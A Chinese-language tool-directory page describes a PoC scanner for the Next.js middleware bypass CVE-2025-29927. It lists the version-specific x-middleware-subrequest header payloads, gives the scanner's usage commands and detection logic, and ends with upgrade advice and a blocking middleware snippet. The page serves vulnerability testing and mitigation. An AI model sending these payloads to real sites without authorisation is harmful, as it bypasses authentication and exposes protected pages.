Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
poc-nextjs-CVE-2025-29927 — 针对 CVE-2025-29927 Next.js 中间件绕过漏洞的自动化 PoC 扫描器。在目标 URL 上测试多个 x-middleware-subrequest 载荷,支持并发扫描和 JSON 导出。 | Kitploit
工具/GitHubGitHub/ticofookfook/poc-nextjs-cve-2025-29927
漏洞扫描器Payload生成漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHubticofookfook/poc-nextjs-cve-2025-29927

poc-nextjs-CVE-2025-29927

针对 CVE-2025-29927 Next.js 中间件绕过漏洞的自动化 PoC 扫描器。在目标 URL 上测试多个 x-middleware-subrequest 载荷,支持并发扫描和 JSON 导出。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
21年前尚未审核
分享

Next.js Middleware Subrequest 漏洞扫描器

一个强大的概念验证 (PoC) 工具,用于检测 Next.js 中间件漏洞 (CVE-2025-29927)。

概述

该工具用于测试 Next.js 应用程序中的一个关键漏洞,其中 x-middleware-subrequest 标头可被利用来绕过中间件中实现的安全检查。该漏洞利用涉及发送带有特定恶意标头的 HTTP 请求,具体取决于 Next.js 的版本。

漏洞利用原理

根据研究,不同版本的 Next.js 存在不同的 payload:

  1. 12.2 之前的版本:

    root@kitploit:~
    x-middleware-subrequest: pages/_middleware
    
  2. 12.2 及之后的版本:

    root@kitploit:~
    x-middleware-subrequest: middleware
    

    或

    root@kitploit:~
    x-middleware-subrequest: src/middleware
    

    (如果应用程序使用 src 目录)

  3. 较新版本(如 15.x):

    root@kitploit:~
    x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
    

    或

    root@kitploit:~
    x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware
    

我们的 PoC 会自动测试所有这些 payload,并报告哪些 payload 成功。

功能特性

  • 测试单个或多个目标
  • 基于多线程的并发扫描
  • 可自定义的请求路径
  • 自动测试所有可能的 payload
  • 详细且带色彩的控制台输出
  • 导出结果为 JSON 格式
  • 健壮的错误处理
  • 全面检测漏洞

环境要求

  • Python 3.7+
  • 所需包:
    • requests
    • colorama

安装

root@kitploit:~
# 克隆仓库或下载文件
# 进入目录
cd poc-nextjs-2025

# 安装所需包
pip install -r requirements.txt

使用

root@kitploit:~
python main.py -u https://example.com   # 测试单个 URL
python main.py -f targets.txt           # 从文件测试多个 URL

命令行参数

选项描述
-u, --url URL要扫描的目标 URL
-f, --file FILE包含多个要扫描的 URL 的文件(每行一个)
-p, --paths PATHS要测试的路径列表,以逗号分隔(默认:常见路径)
-t, --threads N并发线程数(默认:5)
-o, --output FILE将结果保存为 JSON 文件
--timeout N请求超时时间(秒)(默认:10)

示例

root@kitploit:~
# 基本单目标扫描
python main.py -u https://example.com

# 使用自定义路径扫描多个目标
python main.py -f targets.txt -p /api/users,/admin,/dashboard

# 更高并发和更长超时扫描
python main.py -u https://example.com -t 10 --timeout 15

# 将结果保存到 JSON 文件
python main.py -u https://example.com -o scan_results.json

检测方法

扫描器通过以下步骤工作:

  1. 向目标发送一个正常请求
  2. 根据 Next.js 版本,发送带有不同 x-middleware-subrequest 标头变体的请求
  3. 比较响应,识别漏洞指标:
    • 正常请求被阻止(4xx/5xx),但漏洞利用请求被允许(2xx)
    • 响应内容显著差异
    • 身份验证/授权绕过指标

缓解措施

如果你发现存在漏洞的应用程序,请应用以下缓解措施:

  • 升级到 Next.js 14.2.25 或 15.2.3 及更高版本
  • 实现一个中间件来阻止带有 x-middleware-subrequest 标头的请求
root@kitploit:~
export function middleware(request: NextRequest) {
  if (request.headers.has('x-middleware-subrequest')) {
    return new Response('Unauthorized', { status: 401 });
  }
  return NextResponse.next();
}
下载工具